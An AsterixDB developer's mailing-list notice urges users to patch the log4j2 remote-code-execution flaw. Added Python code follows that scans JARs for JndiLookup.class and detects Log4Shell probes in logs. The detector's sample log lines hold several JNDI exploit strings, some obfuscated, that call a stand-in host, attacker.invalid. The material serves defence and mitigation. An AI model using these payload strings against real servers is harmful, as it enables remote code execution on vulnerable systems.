Hi everyone,
Given that AsterixDB extensively uses log4j2, we are consequently
affected by the extremely severe RCE 0-day vulnerability that has come
to light as of late.

Release 0.9.7.1 contains basically only an update to log4j 2.15 to
mitigate this issue; otherwise it is identical to 0.9.7. If you are
using AsterixDB, even if it is not exposed to the internet, it is
absolutely imperative that you either upgrade to 0.9.7.1 or manually
patch your log4j2-core JARs to remove JndiLookup.class. This exploit
is trivial to perform against AsterixDB; for example, simply issuing an
HTTP request with the exploit string would cause log4j to ingest it.
Furthermore, any objects inside datasets that contain the string
could potentially trigger the exploit if given in an erroneous query,
for example.

To reiterate, this vulnerability is as severe as it gets. AsterixDB
exposes many simple, insidious and unexpected routes to triggering it.
Please upgrade or shut down your instance until you can do so.

Thanks,
- Ian

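One way to check a deployment against the manual mitigation Ian describes (an added example, not code from the AsterixDB project or from this thread): walk a directory, report every JAR that still contains JndiLookup.class, read the log4j-core version from the Maven pom.properties that the real JAR embeds, and rewrite a JAR without the class. The JARs built by demo() are constructed zip files with placeholder bytes where the class would be, not real log4j artifacts, and the "2.15 or later is acceptable" threshold in needs_action() simply mirrors the mail; later Apache advisories moved the recommended version further, so treat that threshold as something to raise rather than as a fixed rule.

```python
import io
import os
import shutil
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def _read_version(zf):
    """log4j-core version from the embedded Maven pom.properties, or None."""
    if POM_PROPS not in zf.namelist():
        return None
    props = zf.read(POM_PROPS).decode("utf-8", "replace")
    return next((line.split("=", 1)[1].strip() for line in props.splitlines()
                 if line.startswith("version=")), None)

def inspect_jar(path):
    """Return (version, has_lookup, nested); nested lists (entry, version) for
    embedded JARs (fat/uber JAR, one level deep) that contain JndiLookup.class."""
    with zipfile.ZipFile(path) as zf:
        names = zf.namelist()
        nested = []
        for name in sorted(n for n in names if n.endswith(".jar")):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                if JNDI_LOOKUP in inner.namelist():
                    nested.append((name, _read_version(inner)))
        return _read_version(zf), JNDI_LOOKUP in names, nested

def needs_action(version, has_lookup):
    """The mail's criterion: JndiLookup.class must be gone unless log4j-core is
    2.15 or later; an unknown version with the class present counts as vulnerable."""
    if not has_lookup:
        return False
    if version is None:
        return True
    return tuple(int(x) for x in version.split(".") if x.isdigit()) < (2, 15)

def vulnerable_jars(root):
    """Sorted paths under root that still need action (nested entries as outer!inner)."""
    hits = []
    for path in (os.path.join(d, f) for d, _, fs in os.walk(root)
                 for f in fs if f.endswith(".jar")):
        version, has_lookup, nested = inspect_jar(path)
        if needs_action(version, has_lookup):
            hits.append(path)
        hits += [path + "!" + entry for entry, v in nested if needs_action(v, True)]
    return sorted(hits)

def strip_jndi_lookup(path):
    """The manual mitigation: rewrite the JAR without JndiLookup.class. The copy is
    built in the same directory so the final swap is a rename. True if removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(suffix=".jar", dir=os.path.dirname(path) or ".")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for item in src.infolist():
                if item.filename != JNDI_LOOKUP:
                    dst.writestr(item, src.read(item.filename))
    shutil.move(tmp, path)
    return True

def make_sample_jar(target, version=None, include_lookup=True, nested=None):
    """Constructed sample for the demo: a zip laid out like log4j-core, with
    placeholder bytes where the class would be (not real bytecode)."""
    with zipfile.ZipFile(target, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version:
            zf.writestr(POM_PROPS, "artifactId=log4j-core\nversion=%s\n" % version)
        if include_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
        for name, data in (nested or {}).items():
            zf.writestr(name, data)

def demo():
    """Scratch tree: an old JAR, a 2.15 JAR and a fat JAR embedding an old one.
    Scan, strip the old top-level JAR, rescan; returns (before, after)."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        old = os.path.join(root, "log4j-core-2.14.1.jar")
        make_sample_jar(old, "2.14.1")
        make_sample_jar(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0")
        inner = io.BytesIO()
        make_sample_jar(inner, "2.14.1")
        make_sample_jar(os.path.join(root, "app.jar"), include_lookup=False,
                        nested={"BOOT-INF/lib/log4j-core-2.14.1.jar": inner.getvalue()})
        before = [os.path.relpath(p, root) for p in vulnerable_jars(root)]
        strip_jndi_lookup(old)
        after = [os.path.relpath(p, root) for p in vulnerable_jars(root)]
        return before, after
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Two caveats for real use: JARs embedded in a fat JAR are reported but not rewritten (the outer archive has to be rebuilt), and stripping the class from a JAR on disk changes nothing in a JVM that already loaded it, so the instance still has to be restarted, which is also why the mail says to shut it down until you can upgrade.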
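The HTTP route Ian mentions can be watched for in access or request logs, and the same check can be run over records before they are loaded into a dataset, since he notes that route too. The detector below is an added example, not part of the original mail or of AsterixDB; the log lines are constructed and the attacker host is a reserved .invalid name. It URL-decodes each line and collapses the nested lookups attackers use to hide the jndi prefix (lower/upper, ${::-x} and ${env:...:-x} defaults) before matching, which a plain grep for ${jndi: misses. It is not a full reimplementation of log4j's substitution, so treat a miss as inconclusive rather than as proof the request was clean.

```python
import re
import urllib.parse

# Innermost ${...} with no nested "${" inside; resolved bottom-up, as log4j's substitutor does.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Lookup prefixes whose ":-default" fallback attackers use to smuggle literal characters.
DEFAULT_PREFIXES = {"env", "sys", "java", "main", "date", "ctx", "bundle",
                    "k8s", "spring", "docker", "web", "log4j", "marker"}
# log4j matches lookup prefixes case-insensitively, so the detector must as well.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(m):
    """Collapse one innermost lookup to the literal it would yield, or leave it."""
    body = m.group(1)
    if body.startswith("::-"):          # ${::-j}  -> "j"
        return body[3:]
    if body.startswith(":-"):           # ${:-j}   -> "j"
        return body[2:]
    prefix, sep, rest = body.partition(":")
    prefix = prefix.strip().lower()
    if sep and prefix == "lower":       # ${lower:J} -> "j"
        return rest.lower()
    if sep and prefix == "upper":
        return rest.upper()
    if prefix in DEFAULT_PREFIXES and ":-" in rest:   # ${env:NOPE:-j} -> "j"
        return rest.split(":-", 1)[1]
    return m.group(0)                   # e.g. ${jndi:...}: keep it for the detector

def normalize(text, max_rounds=20):
    """URL-decode, then repeatedly collapse innermost lookups until nothing changes."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        collapsed = INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text

def is_log4shell_probe(text):
    """True if the de-obfuscated text still contains a JNDI lookup."""
    return JNDI.search(normalize(text)) is not None

def scan_lines(lines):
    """Indexes of request lines that carry a JNDI lookup after de-obfuscation."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]

# Constructed sample access-log lines (not real traffic). Line 0 and line 6 are benign;
# line 6 uses ordinary lookups that must not be flagged.
SAMPLE_LINES = [
    'GET /query/service?statement=SELECT%201 "Mozilla/5.0"',
    'GET / "${jndi:ldap://attacker.invalid/a}"',
    'GET / "${${lower:J}ndi:${lower:L}dap://attacker.invalid/a}"',
    'GET / "${${env:NOPE:-j}ndi:rmi://attacker.invalid/x}"',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.invalid/a}"',
    'GET /%24%7Bjndi%3Aldap%3A%2F%2Fattacker.invalid%2Fx%7D "curl/7.79"',
    'GET / "${sys:os.name} ${date:yyyy}"',
]
```

Running scan_lines(SAMPLE_LINES) flags lines 1 through 5 and leaves 0 and 6 alone. Because normalize() stops only when a pass changes nothing, a payload that nests several layers of lower/default tricks still collapses to the plain ${jndi: form; the max_rounds guard just bounds the work on pathological input.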